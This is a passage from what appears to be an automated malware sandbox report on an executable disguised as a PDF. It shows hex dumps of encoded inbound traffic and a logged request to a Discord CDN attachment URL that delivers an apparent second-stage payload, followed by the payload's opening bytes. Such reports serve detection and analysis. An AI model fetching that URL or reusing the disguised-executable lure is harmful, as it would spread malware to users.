c6 ef 80 07 5d 54 9c 6e c3 47 3d 0c c9 a6 4f c9 66 3e 4a 4c a9 d6 c7 85 98 98 68 5b 73 cf 51 82 10 a7 cd c4 fa dd b4 2a 74 7d a4 02 d0 8a 05 0e 32 13 bf 04 d5 43 37 c2 f1 ac be bd 07 85 9b 07 5f 93 Data Ascii: }Zb|%a`[tC0Vw)<F09,'{<Fu\Y`F(u~,:ZmZu*&{x=GmZ,_{K-SZDR6WA3:7M-l`jlx:<l w]| p]TnG=Of>JLh[sQ*t}2C7_
2021-12-01 15:22:56 UTC	238	IN	Data Raw: dc 05 8e bb 31 d9 9b 09 74 fe be 63 55 33 3a a6 7d 97 30 e3 95 d3 8a 97 d7 76 e3 19 9c 65 bd 4c 9b e0 e9 cc dc 05 8e 17 97 d6 12 4e a0 6f 94 68 e1 91 2f ff db 80 fa 59 3c 72 1d a6 7d 97 31 28 41 01 b9 f4 40 7c f5 02 e2 12 ec 86 2c 4a 70 65 5a bf dd 06 ec 2d 28 31 d8 fb 37 85 aa 86 ca 8d be b8 4c cb 59 3c 73 7d 96 54 49 22 32 5b a7 d7 77 86 ca cd 5e c9 b2 91 c8 d3 88 c9 54 af 13 8d be b8 4f fd d6 f4 a5 34 5f 4a 73 c7 4f 23 b5 22 32 5b a4 e0 0e 01 ba 2d ce e0 eb db 81 a0 6e f0 36 65 b4 26 3c 73 7d 96 55 33 33 b3 1d a7 11 d6 f5 c3 ab 59 3c 72 14 33 dd 87 41 2a 46 8d 50 b1 18 18 f4 be b9 2d 23 5d 46 8c 3c 73 7d 97 3a ac 8c 3c 73 7d 96 54 42 36 64 d7 77 87 af 12 e7 07 6e f1 55 b4 a0 6f 9e 11 88 30 b8 c2 c3 44 6a b0 96 55 32 5a be b8 47 35 e2 12 e7 b7 27 be 54 Data Ascii: 1tcU3:}0veLNoh/Y<r}1(A@|,JpeZ-(17LY<s}TI"2[w^TO4_JsO#"2[-n6e&<s}U33Y<r3A*FP-#]F<s}:<s}TB6dwnUo0DjU2ZG5'T
2021-12-01 15:22:56 UTC	242	IN	Data Raw: 87 af 13 8d be b9 2c 48 e1 90 46 8c 3c 73 7d 96 55 32 5a be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d4 d0 e6 1d a6 7d 96 55 32 5a be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 85 4a 96 55 32 5a be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d bc 14 0f 83 a5 fa 4f 23 b5 22 32 5a be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d5 02 e2 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be bb 71 78 09 74 ff db 81 a0 6e f0 36 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d bc a4 78 09 74 ff db 81 a0 6e f0 36 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d bf db 81 a0 6e f0 36 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 Data Ascii: ,HF<s}U2Z,Kdw,Kd}U2Z,Kdw,KdwJU2Z,Kdw,KdwO#"2Z,Kdw,Kd,Kdw,Kdwqxtn6dw,Kdwxtn6dw,Kdwn6dw,Kdw
2021-12-01 15:22:56 UTC	246	IN	Data Raw: cd 1f d3 55 88 31 99 0f f7 7e e7 60 13 55 da ff 9a 8c bc 15 92 0a b8 fe e3 6a 19 78 76 ec 2c 0a 81 7c ab 09 35 9a 43 bf 3b b0 45 8a 8e be 46 52 51 c0 be f8 99 a0 cf 63 14 41 54 15 6d 91 2c e9 4c 9b a0 19 40 c5 4a d7 0f 87 15 92 0a 25 c6 74 00 22 ed b0 7e 18 58 6a 9e c8 d2 aa c9 00 67 a0 91 2c 8e a9 04 a6 0a 2a fe 59 7d e1 7c a9 04 a6 ae e9 1d 59 c3 9a 1e c0 be f8 99 a8 23 b5 63 1b f5 78 f6 ba 4b f1 50 a5 bb 46 50 1d a6 3c 04 23 0f 83 e4 cb 2d 77 78 f6 9a 3b 19 9c 25 69 e0 af 13 cc 92 1f 11 77 78 ec 27 57 37 a6 0a 42 3a 6e b1 6f ef 09 74 be 6a 62 6b 96 ab cf 8c d4 f0 77 54 43 a4 87 50 69 f1 50 a5 bb e2 ff 7a f1 47 c1 17 7f 9b a0 bd da 5e c8 93 1e fc 41 8b 46 73 82 4a 1b 2a b9 d2 3e 29 2c b4 5f b4 c8 57 ba 7f 10 fa b1 c0 b8 42 7d 69 9b 85 2f 58 46 72 2c 9a Data Ascii: U1~`Ujxv,|5C;EFRQcATm,L@J%t"~Xjg,*Y}|Y#cxKPFP<#-wx;%iwx'W7B:notjbkwTCPiPzG^AFsJ*>),_WB}i/XFr,
2021-12-01 15:22:56 UTC	249	IN	Data Raw: ff 33 8e 11 77 79 6f 04 0f 4f 66 57 c8 2d 15 e1 78 09 35 8a 2b 71 b4 f5 4f 23 f4 93 dd 25 45 f4 bf 7e f0 65 0a 09 8a d4 68 09 a4 3d 7d 69 9b 3a fa a7 ff 9a 37 e3 2d 1e 7d 1b a1 b1 cb 55 91 37 19 63 33 35 b1 48 6e 0e e3 2c a3 21 f5 49 eb 56 6f c6 25 ba ee 56 58 01 8b ec a1 f0 77 54 a7 5c 3c 8d 41 87 47 5c 93 32 a4 9b 3b 19 44 c2 48 6e 0f 58 6f 9b e1 d1 0f 57 8f 1b f4 cd 5e 89 67 5b e2 ec d2 14 a7 17 c4 98 a5 04 04 1c cb 85 ef 38 96 aa 5c 34 b7 27 fe 3e c4 70 29 91 45 0a b7 f4 6c 48 6e 0e ff 12 e2 40 2d 31 26 d8 e6 f5 22 77 0c 04 18 c5 52 42 82 63 32 fe e1 70 a0 e3 95 93 1e 00 7e e7 61 af f9 24 64 87 50 5b a5 c7 a7 1b e4 93 32 a5 26 05 81 a0 2f b4 2c f3 59 69 e9 a4 39 3f e3 36 9b 1e 28 4a 7e 4b 49 eb 57 d3 33 35 0a b3 96 aa 78 d5 28 a9 04 a6 1a 6e 48 79 d9 Data Ascii: 3wyoOfW-x5+qO#%E~eh=}i:7-}U7c35Hn,!IVo%VXwT\<AG\2;DHnXoW^g[8\4'>p)ElHn@-1&"wRBc2p~a$dP[2&/,Yi9?6(J~KIW35x(nHy
2021-12-01 15:22:56 UTC	253	IN	Data Raw: d4 0f 7c ee 5c 2b 3d a3 7e e0 43 8e 9d a6 f6 4d 5b ca 81 96 de 0d 90 c5 4f 57 c1 c5 aa f2 b0 69 9a a6 12 e2 eb fc df 6b 2c c6 35 a7 76 06 2c c8 d1 6b 9d a6 f6 4d 5b ca ee da 07 e5 65 a5 07 c6 25 4e f5 49 c8 92 c0 b6 e0 85 aa 87 50 5a 5f ca dc 8f c7 25 a6 09 b4 24 c8 2d 31 e0 e6 1e a3 90 ad fa 17 94 58 fc df 93 46 70 b0 1d d4 1b 55 6a e5 92 0e 8b a9 5c 48 6d 2b 42 8c 49 14 0b 01 dc f8 0f 08 0e ff 2e 37 0f 73 3d 7d 9e 2c c0 5a eb 22 cd a0 97 36 8c c8 87 24 d3 28 cc 23 4a 6d 76 ec d8 af 98 86 6c 60 c5 0f 08 d6 80 dd 02 1d 59 ca f5 2a 1c cf 26 b7 2f 96 de e1 dd 0d 81 5e 32 57 df 7f ce 6a 0e 45 87 ff 24 c8 d5 df 63 b9 69 ed 5e 88 ba a7 ba 24 67 af 56 39 18 5c 4a 62 90 45 02 b7 ac 80 5d cd a2 36 ef b3 1d a6 84 ce 1d e3 1c 01 d6 91 fa b0 f2 3b b0 da e4 70 a0 bc Data Ascii: |\+=~CM[OWik,5v,kM[e%NIPZ_%$-1XFpUj\Hm+BI.7s=},Z"6$(#Jmvl`Y*&/^2WjE$ci^$gV9\JbE]6;p
2021-12-01 15:22:56 UTC	258	IN	Data Raw: 53 1b 35 e2 53 14 1f ab 49 2d d2 eb e9 9d fe 59 7c 2a 52 aa c7 76 0c fb 91 af c7 4f 23 b5 2e 50 e4 23 dd 86 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 58 82 4a 96 15 1f 68 bc 4c 70 0a 09 75 81 49 d7 77 c6 f6 52 c2 d3 e4 7c 4a cf 39 2c 78 f6 ba bc ee d9 7c 53 3d f6 50 2e 50 a5 fa 4d a7 ff 9a d5 e6 a5 ef c6 cd 1f 79 74 fa b0 b6 2c 2f e3 6a 82 22 73 46 9c 0c ae 51 1b 4d 95 87 af 13 8d 8f c3 45 0a f7 38 96 aa 78 09 74 ff eb a9 04 e7 9e 96 aa 78 f6 45 4a 1b 62 8f 3b 1a e1 6f 72 99 35 21 b0 d7 4d a9 6c fb 58 dd df d2 b1 d8 c9 ab f6 65 98 b2 9b a0 bc 70 4d e1 6f f9 e0 e6 1d e7 4d c6 75 7d 69 9a ad e6 e2 ec a6 46 64 d7 36 ee a1 48 6e 0f 9c 19 74 ff 9a 65 5e 70 0a 09 54 40 95 d2 aa 55 f6 fd 29 3b 7b c8 3a 6e b1 ca 03 dc fb Data Ascii: S5SI-Y|*RvO#.P#,Kdw,Kdw,KXJhLpuIwR|J9,x|S=P.PMyt,/j"sFQME8xtxEJb;or5!MlXepMoMu}iFd6Hnte^pT@U);{:n
2021-12-01 15:22:56 UTC	262	IN	Data Raw: 5c 95 d2 eb a9 80 8f 3c 63 de ca 5c e1 ee 30 49 6f f0 1e 5d 46 a8 f9 4c 43 8e b3 96 03 37 27 34 9c 64 d7 77 13 1c dc 0c 70 f5 83 8f 4f 99 1c a8 41 5b 1f f4 74 ac 73 65 d1 ae 1a e6 09 ff c3 03 ef 7b 9d 6d 76 42 09 84 ac 76 8f 94 06 bf fb 5a 7d 96 55 32 da 6d 91 d8 71 bb 31 d8 fa cb cb a6 6d e5 93 b9 fe dd 45 51 76 24 44 0e ff 24 36 a2 9b f9 8f 4e 72 f9 1e 2b 1b a2 a5 71 a0 e5 68 6a b0 c5 4a 92 89 e9 41 8b e2 4d 9b 9d 12 57 0c 03 39 65 a5 05 96 29 2c b7 62 59 c4 9d 6d a0 e5 ca df ce 6a f7 b9 d4 85 91 7f e6 ee 0a b8 e9 54 f2 b2 98 2f 23 c0 85 a2 98 aa f2 b2 9e 1c d3 30 6e 0f 7c ef 01 b7 db c4 43 d6 7e d6 7e 38 15 61 6b 99 a3 35 67 57 62 2d 32 1f 20 fb 5a 4e ed 25 f4 41 eb 59 40 bd b3 15 c7 b0 6a a3 7e cb d2 1b ec a7 bc b5 c9 a4 3d 7f 73 ac 78 4c 98 a2 36 ef Data Ascii: \<c\0Io]FLC7'4dwpOA[tse{mvBvZ}U2mq1mEQv$D$6Nr+qhjJAMW9e),bYmjT/#0n|C~~8ak5gWb-2 ZN%AY@j~=sxL6
2021-12-01 15:22:56 UTC	266	IN	Data Raw: a7 3e 91 0b 86 d3 90 bd de f1 fd 5d 46 cd 44 de 61 40 f4 24 6e a9 5e 08 c2 e7 cc 23 ad 85 52 ef 38 bf b0 62 9f 60 ed fd 29 dc 8f 3b b4 2b 1f 20 d1 25 31 fc 07 91 d0 6d 96 10 8e 92 c0 76 8f db d0 19 94 db 79 c9 df 5d cd 7e 4f dc 3c f8 b2 de 82 f1 33 2d 83 2e 5c 94 af 2b 42 7a 4b 92 9d 6d 9e 24 ba 5b 04 6e e8 73 82 2a cd a6 38 e2 c0 35 ee 66 23 8d 35 1a 5b ca 04 6c 17 da 72 da 76 60 fd 29 a0 6e b1 02 b0 fe 0c 3b c2 3c 8c c1 86 c4 30 10 8e 61 d9 18 29 3b 95 d2 aa 9d 91 a0 3b 31 eb 51 6d e7 45 81 51 a3 09 29 4d ee 6c 62 09 47 58 ef e0 fe 9d 65 b6 2e 05 69 24 ba 6c b6 fc 0f dd d9 8c d7 88 ce c3 c2 2a 85 55 cd 77 36 8c c0 fb 5c c3 04 fe ca bf 2b 40 19 c5 13 d7 b7 14 f0 c9 ab 9f 03 a7 74 30 de f5 97 5c 3c 8c 7a a4 90 80 96 a9 51 a5 da 76 60 fd 29 a0 6e b1 01 d3 Data Ascii: >]FDa@$n^#R8b`);+ %1mvy]~O<3-.\+BzKm$[ns*85f#5[lrv`)n;<0a);;1QmEQ)MlbGXe.i$l*Uw6\+@t0\<zQv`)n
2021-12-01 15:22:56 UTC	270	IN	Data Raw: 4f 62 cf 87 af 52 b7 93 cd 1e 18 59 3c 32 47 8f c3 04 fb 7d 96 14 13 ad 0e 41 1a 8a 37 a6 64 4b 19 dc 34 1f ab 49 24 77 87 ee 27 9f eb e8 37 1b a1 b1 0d a6 7d d7 53 69 64 96 76 58 b9 6d 4f 9b e1 d1 49 24 37 a6 62 16 14 4e bf af 13 cc c6 25 ba ee 2b 59 3c 33 ed ee 31 99 c6 45 0a b6 95 92 4b 58 af cb 59 7d 8e 41 00 9c 70 1d a6 3c 66 74 ff 9b d7 c7 4f 63 63 c1 40 3d cf 73 7d d6 cc c0 be f9 f5 da ff 9b d8 ee 31 98 63 5d 46 cd 56 f0 36 64 d7 6f 73 3c 7a f0 36 64 d7 77 87 af 13 8d be b9 2c 4b 19 dd 8c 30 55 73 74 1b a1 f0 36 64 d7 77 87 af 13 cc d5 16 d4 7b 6e 0f 83 a7 8c 59 4f 50 c4 a4 3b f6 9f 69 59 93 ed ae 37 79 9d 36 36 88 42 1e 07 5a bf 3b b1 08 71 0a 93 b9 5c a2 17 d6 86 4b 77 ee 43 71 2b 80 12 05 69 25 b2 7f 9b a1 7d 96 55 41 65 29 b7 46 e0 4d 19 9c 64 Data Ascii: ObRY<2G}A7dK4I$w'7}SidvXmOI$7bN%+Y<31EKXY}Ap<ftOcc@=s}1c]FV6dos<z6dw,K0Ust6dw{nYOP;iY7y66BZ;q\KwCq+i%}UAe)FMd
2021-12-01 15:22:56 UTC	281	IN	Data Raw: 4e 60 46 8c 3c 73 7d 96 55 32 52 aa c7 93 f7 81 a0 6e f0 36 64 d7 b7 27 bf 3b f1 b8 aa 87 af 13 8d be b8 aa c7 93 fd d6 b5 fe 7f 9b a1 2c 52 aa 87 8a e5 73 85 ae b5 66 5f 4b 19 b9 fc bd ce e5 be fd 55 12 f5 c2 48 95 f6 01 d4 08 f5 e6 59 bf f7 07 e5 59 61 a8 69 9b 1e 48 97 3e bb 31 98 86 38 01 4f aa e3 cc 85 f0 f6 76 04 a6 af 6f 76 fb f1 31 bc 84 d8 9e 69 24 eb a4 10 50 65 69 88 ba fa 4f 4f 4c f4 02 8f ac fe 1f d9 08 82 60 bf 5a e8 22 57 43 64 93 a0 01 2d 88 43 71 0b 3b 83 c4 9e 69 64 d7 0e 43 68 8e 33 9b 93 b9 5f 09 06 8d e8 22 32 28 35 b1 75 ed dc 42 ee 5e a7 bd 44 e6 4b 19 9c 64 d7 05 1d f5 af 7c 61 16 6d 2d bc d5 24 37 e7 ed da ac e1 ff a9 42 e7 eb c8 96 27 de 5f 4b 19 9c 64 a5 8e 12 67 30 27 f9 f4 12 78 68 b7 27 bf 3b f1 ca a3 a6 10 6a 94 16 20 7f e9 Data Ascii: N`F<s}U2Rn6d';,Rsf_KUHYYaiH>18Ovov1i$PeiOOL`Z"WCd-Cq;idCh3_"2(5uB^DKd|am-$7B'_Kdg0'xh';j
2021-12-01 15:22:56 UTC	286	IN	Data Raw: 9b b2 7b 55 b1 f4 cb 0c 3b 7a 0e 41 e5 aa a2 8c fc df 48 ca 89 77 84 d8 05 0f c4 20 ee 1a d8 71 bb 6a b8 6c e8 dd 79 ea 72 12 cc f7 04 6c e5 e7 6c d0 3e f3 4f a8 d4 a3 36 39 14 e4 e7 60 bf bf d2 28 41 40 b4 36 0c eb 20 49 4d 47 55 f2 08 0e ff 5f 90 ae 91 88 9c b0 83 2e 50 a5 fa 59 85 aa c6 44 d7 cf 9c 9b 65 aa 6f 73 3d 5b 15 87 24 37 e7 9f ec 95 d2 aa 0e 18 a1 0f 7c 96 50 4d 1e 68 f1 b8 bf b0 96 55 32 58 00 dd c7 c7 7f 23 4a 69 1d 5c 2b c9 15 1a 36 dc fb 2e db d1 80 1d e6 6c 1b b4 2b c9 15 5b 51 90 b9 d3 e6 7d 7e 18 59 4d d2 fe d2 eb e8 eb a5 42 7d 69 e1 d4 18 19 dc 14 0f 96 de 09 74 ff dc bd 36 25 72 2e e8 dd 79 09 2d 26 3c 33 cd 5e dd 0d 7e 18 19 9b 58 b9 6d a6 d5 ca 28 be 3c 1d 4e a0 2e 40 7d 83 2e 50 a5 fa 48 28 41 41 c8 5e 70 0a 09 f1 3b 19 9c 24 27 Data Ascii: {U;zAHw qjlyrll>O69`(A@6 IMGU_.PYDeos=[$7|PMhU2X#Ji\+6.l+[Q}~YMB}it6%r.y-&<3^~Xm(<N.@}.PH(AA^p;$'
2021-12-01 15:22:56 UTC	302	IN	Data Raw: 4b ee 33 a8 af ea a7 15 e0 0e 00 dc f0 cc 5d 84 26 36 b6 ce a7 f1 cb 53 29 fe 75 84 ad 48 90 33 f0 cf e3 90 32 71 81 20 23 3f 29 f5 02 d3 ae df 61 bb 73 89 f1 62 26 79 05 69 25 32 36 69 be b6 d6 ff df b1 34 f3 6f 42 42 b3 de 47 f8 3e 58 85 ae e5 5a b6 09 22 d9 e7 67 32 83 47 d4 6b a9 35 3a b3 19 77 86 9c 62 a7 ff d2 42 e4 f8 95 49 2b 12 08 1a 21 6f 77 f3 bd cd de e9 7d 94 25 97 28 c1 1b 5e 37 4e 8a df 77 da 74 ac 88 f1 3b f2 4e a1 0b f9 1c aa b4 d5 72 c4 48 91 c8 d2 ae 79 4e a1 a8 82 22 32 2e b8 f8 0c f1 cd 1b 9d 39 c8 d4 7a 41 74 0e 39 36 93 cd 5e c8 bf d3 2b c1 35 19 d9 46 8a bd e4 29 c4 c8 d2 97 3f 0a 7f dd 87 da d2 14 8f c6 b9 07 91 48 af 99 dc 04 e7 1a f6 ab d0 e6 5c 4b 69 49 cd bc 6f e8 da 82 fb 4a 5d cf 98 1f 23 b5 63 9d ed 0e 00 dd 86 2c b7 62 15 Data Ascii: K3]&6S)uH32q #?)asb&yi%26i4oBBG>XZ"g2Gk5:wbBI+!ow}%(^7Nwt;NrHyN"2.9zAt96^+5F)?H\KiIoJ]#c,b
2021-12-01 15:22:56 UTC	313	IN	Data Raw: f1 b8 2d 4a 99 1c a6 b4 93 3b c2 c3 45 0a 4e 24 38 69 9c 19 1f 79 bf c7 1a 97 2f 9e e0 58 ea df 4f a0 82 a9 51 28 45 c8 8f 98 04 21 3b 0d 2f 2c 43 8e 82 a9 05 db 88 44 71 fd 26 b7 d8 05 df b8 42 d2 ef f0 bb 39 b1 93 9b b2 77 0c ae 01 5f 4f e1 cd a1 0f 35 a3 1d f6 41 c0 3d fe 1c a8 6e 7b c4 08 7a 0e 0c 39 b1 43 85 aa c7 4d a6 78 e2 d3 5e cc a8 42 06 13 72 21 0c 13 4e 2b c5 1f 20 3d bb ba a7 a2 f8 19 70 7e 4d 1e 68 6c 28 41 00 dd 87 ab 49 d3 92 b4 7a b1 f0 f6 ce 22 cd a1 21 bf d3 6f c3 42 f6 45 0e 78 8a f7 4c 58 46 73 cb fa a7 af 17 57 b4 30 96 51 78 f6 45 81 f0 30 21 70 70 36 6c bb ce b0 97 5c c5 3e 68 68 28 c4 c0 35 21 b8 fa b0 c7 4e 2b 0a f7 b2 52 2f d3 e2 1b 2a 1e 2c 1b 5e 9a 5d cd 0e 52 b3 69 b6 20 2d 8e cc 1f f3 b5 72 05 6b e2 41 50 a5 fa 4f 23 b5 e5 Data Ascii: -J;EN$8iy/XOQ(E!;/,CDq&B9w_O5A=n{z9CMx^Br!N+ =p~Mhl(AIz"!oBExLXFsW0QxE0!pp6l\>hh(5!N+R/*,^]Ri -rkAPO#
2021-12-01 15:22:56 UTC	329	IN	Data Raw: 2d 4b 16 d2 62 84 74 f8 8b 4f df c3 ce 22 cd a1 0f 7c ab f6 ba 55 b0 12 05 6a 24 c1 1b 31 48 52 f1 e6 dd b7 27 bf 7a a9 14 0a 30 55 73 da eb b4 29 c4 db 7e e8 22 73 da e7 9a 98 5a be b9 2e ac cf a4 87 50 5c ea cf 63 46 73 8d 20 a0 fe c9 c4 0b 22 6c 2b d0 e7 67 dc fb 2e a6 e6 f5 94 50 cf 63 55 b2 9b 89 b4 a0 2f 74 ef b6 63 57 be bd 66 55 36 32 d1 6e 7b 81 4e 23 99 a9 04 f4 bf cb 59 7d 31 c0 83 24 9f 00 22 cd a6 b3 f5 32 d3 dc 76 04 e7 94 60 34 de c2 c2 0d 57 cf 2d 45 9a e4 f3 42 7d 6e 17 7f 59 4e a0 6e fb e1 69 e5 51 29 34 be 3a 5d 42 0f 13 4e fb 8f 03 55 32 5a ff 7c 03 61 96 aa 78 f0 7f 73 a7 76 f4 c9 ac bf 67 d6 09 32 d3 6e b3 90 16 60 cd 4d e1 60 36 e5 da 8a 3f 07 28 b7 db b2 d7 fe 51 e1 13 b8 df 77 b4 ec a7 ff db 81 a1 0c c8 96 a2 c8 a7 39 65 0c 28 c8 Data Ascii: -KbtO"|Uj$1HR'z0Us)~"sZ.P\cFs "l+g.PcU/tcWfU62n{N#Y}1$"2v`4W-EB}nYNniQ)4:]BNU2Z|axsvg2n`M`6?(Qw9e(

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49754	162.159.129.233	443	C:\Users\user\Desktop\DOC209272621615.PDF.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-01 15:23:14 UTC	333	OUT	GET /attachments/900622540588843013/915461671072432149/Wkklnmczcyrsyafzucgflytssyuynbb HTTP/1.1 User-Agent: aswe Host: cdn.discordapp.com Cache-Control: no-cache
2021-12-01 15:23:14 UTC	334	IN	HTTP/1.1 200 OK Date: Wed, 01 Dec 2021 15:23:14 GMT Content-Type: application/octet-stream Content-Length: 281088 Connection: close CF-Ray: 6b6d50c8d96b4eaa-FRA Accept-Ranges: bytes Age: 36027 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=Wkklnmczcyrsyafzucgflytssyuynbb ETag: "95c7205834a4a92a4f9bfc212c2326dc" Expires: Thu, 01 Dec 2022 15:23:14 GMT Last-Modified: Wed, 01 Dec 2021 04:37:50 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1638333470898312 x-goog-hash: crc32c=meGuLw== x-goog-hash: md5=lccgWDSkqSpPm/whLCMm3A== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 281088 X-GUploader-UploadID: ADPycduUlNf2PA7zKpv-QoNOOzrwHgbFRX6mQZp4zDQlyL3kPqYyPZgI-KJkcPR2dvSRCq08DP8GeNCAFObtI59ESkwHkFkhMQ X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
2021-12-01 15:23:14 UTC	335	IN	Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 73 74 55 48 6f 54 56 30 5a 43 53 25 32 42 61 25 32 46 58 59 76 7a 66 6b 4c 65 66 25 32 46 68 31 30 33 42 41 33 32 53 49 75 47 71 77 48 4e 57 7a 4f 37 6f 66 4f 58 66 48 4f 4c 6f 53 39 69 30 73 4a 41 7a 74 48 63 4d 39 59 78 41 77 69 6c 50 47 46 42 35 67 4b 41 66 61 79 75 37 4f 69 48 62 50 6f 45 71 47 25 32 42 49 59 75 75 54 59 4d 6e 6a 47 5a 76 43 32 4f 71 55 47 70 63 47 6c 49 6d 53 47 25 32 42 69 69 32 4e 53 39 65 35 42 34 62 41 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=stUHoTV0ZCS%2Ba%2FXYvzfkLef%2Fh103BA32SIuGqwHNWzO7ofOXfHOLoS9i0sJAztHcM9YxAwilPGFB5gKAfayu7OiHbPoEqG%2BIYuuTYMnjGZvC2OqUGpcGlImSG%2Bii2NS9e5B4bA%3D%3D"}],"group":"cf-nel","max_a
2021-12-01 15:23:14 UTC	335	IN	Data Raw: 05 2d 8f 93 8a 79 c5 0e 44 c6 9d be e1 d7 39 a5 be fd 97 87 e8 6c a2 37 a3 b4 f0 6e a8 c5 04 ae d5 36 25 ea 60 83 ec 68 a5 bb 61 08 a9 43 4b 50 e1 d4 b1 48 d6 bb 78 4d 5a ff 8b e1 c8 95 9c 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 Data Ascii: -yD9l7n6%`haCKPHxMZ-s<#uR$yDrFi-s<#uR$yDrFi-s<#uR$yDrFi-s<#uR$yDrFi-s<#uR$yDrFi-s<#uR$yDrFi
2021-12-01 15:23:14 UTC	336	IN	Data Raw: 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 Data Ascii: $$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0
2021-12-01 15:23:14 UTC	338	IN	Data Raw: e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 Data Ascii: I$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C
